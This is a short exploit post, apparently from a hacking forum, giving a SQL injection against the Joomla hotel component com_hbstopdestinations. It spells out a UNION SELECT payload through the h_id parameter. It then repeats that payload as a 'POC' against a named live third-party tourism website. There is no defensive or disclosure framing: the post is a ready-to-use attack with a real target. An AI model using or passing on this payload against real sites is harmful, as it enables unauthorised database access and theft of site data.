Joomla com_hbstopdestinations SQL-inj vuln
This component is made specifically for hotels; it is not very popular...
Exploit:
index.php?option=com_hbstopdestinations&task=detai ls&h_id=-50+union+select+1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7 ,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10, 1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4, 5,6,7,8,9,10,1,2,3,4,5,6,7,8,9--&cId=&sId=&cityId=&f_date=&t_date=
POC:
http://zambiatourismnews.com/index.php?option=com_hbstopdestinations&task=detai ls&h_id=-50+union+select+1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7 ,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10, 1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4, 5,6,7,8,9,10,1,2,3,4,5,6,7,8,9--&cId=&sId=&cityId=&f_date=&t_date=
I won't show the code, since the upload didn't work)